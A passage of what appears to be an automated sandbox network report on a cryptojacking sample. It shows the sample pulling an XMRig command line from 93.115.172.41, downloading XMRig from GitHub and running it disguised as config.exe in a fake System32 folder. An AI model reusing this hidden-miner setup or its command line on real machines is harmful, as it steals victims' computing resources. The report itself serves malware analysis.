Jan 8, 2025 16:40:25.253684044 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.253712893 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.253793955 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.253808022 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.253844023 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.253849983 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.253864050 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.253885031 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.254143953 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254163027 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254194021 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.254200935 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254225016 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.254236937 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.254358053 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254371881 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254415035 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.254426956 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254468918 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.254636049 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254650116 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254694939 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.254700899 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254740000 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.254875898 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254889965 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254940033 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.254947901 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.254983902 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.255297899 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.255316973 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.255359888 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.255367994 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.255403042 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.255774975 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.344141006 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344161034 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344229937 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.344263077 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344316006 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.344316959 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344330072 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344352007 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344368935 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.344377041 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344400883 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.344419956 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.344618082 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344630957 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344683886 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.344691992 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344748020 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.344774961 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344789028 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344831944 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.344840050 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.344877005 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.345124006 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345135927 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345195055 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.345201969 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345242023 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.345340014 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345355034 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345405102 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.345412016 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345452070 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.345540047 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345554113 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345603943 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.345611095 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345652103 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.345891953 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345906019 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.345967054 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.345973969 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.346013069 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.434725046 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.434750080 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.434815884 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.434829950 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.434938908 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.434962034 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.434979916 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.434987068 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.434998989 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.435028076 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.435110092 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.435131073 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.435162067 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.435164928 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.435173988 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.435199022 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.435209990 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.435214996 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.435250998 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.435605049 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.435631037 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.435647011 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.435653925 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.435723066 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:25.435726881 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:25.593508005 CET	80	49704	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:25.593575001 CET	49704	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:25.593703985 CET	49704	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:25.598515034 CET	80	49704	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:26.061650038 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:26.066637993 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:26.066709995 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:26.066998959 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:26.072124958 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:26.685076952 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:26.686233997 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:26.691133976 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:26.858747959 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:26.903400898 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:26.994730949 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:27.045572996 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:29.157932043 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:29.200349092 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:34.044600964 CET	49729	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:34.049561977 CET	80	49729	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:34.049674988 CET	49729	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:34.051368952 CET	49729	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:34.056097031 CET	80	49729	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:34.677239895 CET	80	49729	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:34.687007904 CET	49729	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:34.692145109 CET	80	49729	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:34.692199945 CET	49729	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:39.203267097 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:39.256063938 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:42.176651955 CET	49779	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:42.181451082 CET	80	49779	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:42.184056997 CET	49779	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:42.184883118 CET	49779	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:42.189673901 CET	80	49779	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:42.774975061 CET	80	49779	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:42.778028965 CET	49779	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:42.782934904 CET	80	49779	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:42.782989979 CET	49779	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:48.522402048 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:48.527400017 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:48.527477980 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:48.527725935 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:48.532524109 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:49.153899908 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:49.155196905 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:49.160032034 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:49.323852062 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:49.371565104 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:49.412029982 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:49.454284906 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:49.465328932 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:49.496716976 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:59.484684944 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:59.488507986 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:59.527817965 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:59.543438911 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:08.800627947 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:08.804543972 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:08.840325117 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:08.855938911 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:18.988802910 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:18.992331028 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:19.043446064 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:19.043812990 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:19.145133972 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:19.148808956 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:19.199851990 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:19.199851990 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:29.022964001 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:29.026869059 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:29.074731112 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:29.076083899 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:31.441303968 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:31.445185900 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:31.480998039 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:31.496582031 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:41.563174009 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:41.567023993 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:41.605968952 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:41.621582985 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:51.606304884 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:51.610155106 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:41:51.652865887 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:41:51.652865887 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:42:01.904999018 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:42:01.908864975 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:42:01.949764967 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:42:01.949764967 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:42:11.907023907 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:42:11.910511971 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:42:11.949762106 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:42:11.965385914 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:42:19.217686892 CET	1300	49820	93.115.172.41	192.168.2.5
Jan 8, 2025 16:42:19.221432924 CET	1300	49707	93.115.172.41	192.168.2.5
Jan 8, 2025 16:42:19.262253046 CET	49820	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:42:19.262253046 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:42:20.694195032 CET	49707	1300	192.168.2.5	93.115.172.41
Jan 8, 2025 16:42:20.779226065 CET	49820	1300	192.168.2.5	93.115.172.41

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 16:40:20.751435995 CET	54382	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:40:20.758291006 CET	53	54382	1.1.1.1	192.168.2.5
Jan 8, 2025 16:40:21.895497084 CET	59708	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:40:21.902359009 CET	53	59708	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 16:40:20.751435995 CET	192.168.2.5	1.1.1.1	0x200b	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:40:21.895497084 CET	192.168.2.5	1.1.1.1	0x6af2	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 16:40:20.758291006 CET	1.1.1.1	192.168.2.5	0x200b	No error (0)	github.com	140.82.121.4	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:40:21.902359009 CET	1.1.1.1	192.168.2.5	0x6af2	No error (0)	objects.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:40:21.902359009 CET	1.1.1.1	192.168.2.5	0x6af2	No error (0)	objects.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:40:21.902359009 CET	1.1.1.1	192.168.2.5	0x6af2	No error (0)	objects.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:40:21.902359009 CET	1.1.1.1	192.168.2.5	0x6af2	No error (0)	objects.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

https:

objects.githubusercontent.com

93.115.172.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	93.115.172.41	80	3092	C:\Users\user\Desktop\pTVKHqys2h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:40:19.990174055 CET	84	OUT	GET /private/aW5zdHJ1Y3Rpb25zCg==.txt HTTP/1.1 accept: / host: 93.115.172.41
Jan 8, 2025 16:40:20.591267109 CET	434	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:40:20 GMT Server: Apache/2.4.62 (Debian) Last-Modified: Fri, 03 Jan 2025 22:04:56 GMT ETag: "b6-62ad478144f97" Accept-Ranges: bytes Content-Length: 182 Vary: Accept-Encoding Content-Type: text/plain Data Raw: 2d 6f 20 39 33 2e 31 31 35 2e 31 37 32 2e 34 31 3a 31 33 30 30 20 2d 61 20 72 78 20 2d 6b 20 2d 2d 74 6c 73 20 2d 2d 72 69 67 2d 69 64 20 6d 69 6e 65 72 20 2d 2d 63 70 75 2d 70 72 69 6f 72 69 74 79 20 32 20 2d 2d 63 70 75 2d 6d 61 78 2d 74 68 72 65 61 64 73 2d 68 69 6e 74 20 34 35 20 2d 2d 72 61 6e 64 6f 6d 78 2d 6d 6f 64 65 20 6c 69 67 68 74 20 2d 2d 64 6f 6e 61 74 65 2d 6c 65 76 65 6c 20 30 20 2d 2d 63 70 75 2d 61 66 66 69 6e 69 74 79 20 31 20 2d 2d 6d 61 78 2d 63 70 75 2d 75 73 61 67 65 20 31 30 20 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 0a Data Ascii: -o 93.115.172.41:1300 -a rx -k --tls --rig-id miner --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49729	93.115.172.41	80	940	C:\Users\user\AppData\Local\System32\config.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:40:34.051368952 CET	84	OUT	GET /private/aW5zdHJ1Y3Rpb25zCg==.txt HTTP/1.1 accept: / host: 93.115.172.41
Jan 8, 2025 16:40:34.677239895 CET	434	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:40:34 GMT Server: Apache/2.4.62 (Debian) Last-Modified: Fri, 03 Jan 2025 22:04:56 GMT ETag: "b6-62ad478144f97" Accept-Ranges: bytes Content-Length: 182 Vary: Accept-Encoding Content-Type: text/plain Data Raw: 2d 6f 20 39 33 2e 31 31 35 2e 31 37 32 2e 34 31 3a 31 33 30 30 20 2d 61 20 72 78 20 2d 6b 20 2d 2d 74 6c 73 20 2d 2d 72 69 67 2d 69 64 20 6d 69 6e 65 72 20 2d 2d 63 70 75 2d 70 72 69 6f 72 69 74 79 20 32 20 2d 2d 63 70 75 2d 6d 61 78 2d 74 68 72 65 61 64 73 2d 68 69 6e 74 20 34 35 20 2d 2d 72 61 6e 64 6f 6d 78 2d 6d 6f 64 65 20 6c 69 67 68 74 20 2d 2d 64 6f 6e 61 74 65 2d 6c 65 76 65 6c 20 30 20 2d 2d 63 70 75 2d 61 66 66 69 6e 69 74 79 20 31 20 2d 2d 6d 61 78 2d 63 70 75 2d 75 73 61 67 65 20 31 30 20 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 0a Data Ascii: -o 93.115.172.41:1300 -a rx -k --tls --rig-id miner --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49779	93.115.172.41	80	6044	C:\Users\user\AppData\Local\System32\config.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:40:42.184883118 CET	84	OUT	GET /private/aW5zdHJ1Y3Rpb25zCg==.txt HTTP/1.1 accept: / host: 93.115.172.41
Jan 8, 2025 16:40:42.774975061 CET	434	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:40:42 GMT Server: Apache/2.4.62 (Debian) Last-Modified: Fri, 03 Jan 2025 22:04:56 GMT ETag: "b6-62ad478144f97" Accept-Ranges: bytes Content-Length: 182 Vary: Accept-Encoding Content-Type: text/plain Data Raw: 2d 6f 20 39 33 2e 31 31 35 2e 31 37 32 2e 34 31 3a 31 33 30 30 20 2d 61 20 72 78 20 2d 6b 20 2d 2d 74 6c 73 20 2d 2d 72 69 67 2d 69 64 20 6d 69 6e 65 72 20 2d 2d 63 70 75 2d 70 72 69 6f 72 69 74 79 20 32 20 2d 2d 63 70 75 2d 6d 61 78 2d 74 68 72 65 61 64 73 2d 68 69 6e 74 20 34 35 20 2d 2d 72 61 6e 64 6f 6d 78 2d 6d 6f 64 65 20 6c 69 67 68 74 20 2d 2d 64 6f 6e 61 74 65 2d 6c 65 76 65 6c 20 30 20 2d 2d 63 70 75 2d 61 66 66 69 6e 69 74 79 20 31 20 2d 2d 6d 61 78 2d 63 70 75 2d 75 73 61 67 65 20 31 30 20 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 0a Data Ascii: -o 93.115.172.41:1300 -a rx -k --tls --rig-id miner --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	140.82.121.4	443	3092	C:\Users\user\Desktop\pTVKHqys2h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:40:21 UTC	113	OUT	GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip HTTP/1.1 accept: / host: github.com
2025-01-08 15:40:21 UTC	972	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 08 Jan 2025 15:40:21 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/72dc0507-a032-45aa-8216-7bb8c017c7bb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T154021Z&X-Amz-Expires=300&X-Amz-Signature=8c4d676315f1311223ee8aea8fb8585ffbc7efe5c83d3fb7f3495c11451fe4bc&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-gcc-win64.zip&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-01-08 15:40:21 UTC	3381	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	185.199.110.133	443	3092	C:\Users\user\Desktop\pTVKHqys2h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:40:22 UTC	646	OUT	GET /github-production-release-asset-2e65be/88327406/72dc0507-a032-45aa-8216-7bb8c017c7bb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T154021Z&X-Amz-Expires=300&X-Amz-Signature=8c4d676315f1311223ee8aea8fb8585ffbc7efe5c83d3fb7f3495c11451fe4bc&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-gcc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1 accept: / referer: https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip host: objects.githubusercontent.com
2025-01-08 15:40:22 UTC	863	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3784815 Content-Type: application/octet-stream Last-Modified: Sun, 03 Nov 2024 07:56:32 GMT ETag: "0x8DCFBDD0876C712" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: cfcbd4ba-e01e-0022-54c6-2d244a000000 x-ms-version: 2024-08-04 x-ms-creation-time: Sun, 03 Nov 2024 07:56:32 GMT x-ms-blob-content-md5: XkjYSzPMDKDNspsDqHX9Og== x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=xmrig-6.22.2-gcc-win64.zip x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 2635 Date: Wed, 08 Jan 2025 15:40:22 GMT X-Served-By: cache-iad-kiad7000089-IAD, cache-ewr-kewr1740020-EWR X-Cache: HIT, HIT X-Cache-Hits: 2613, 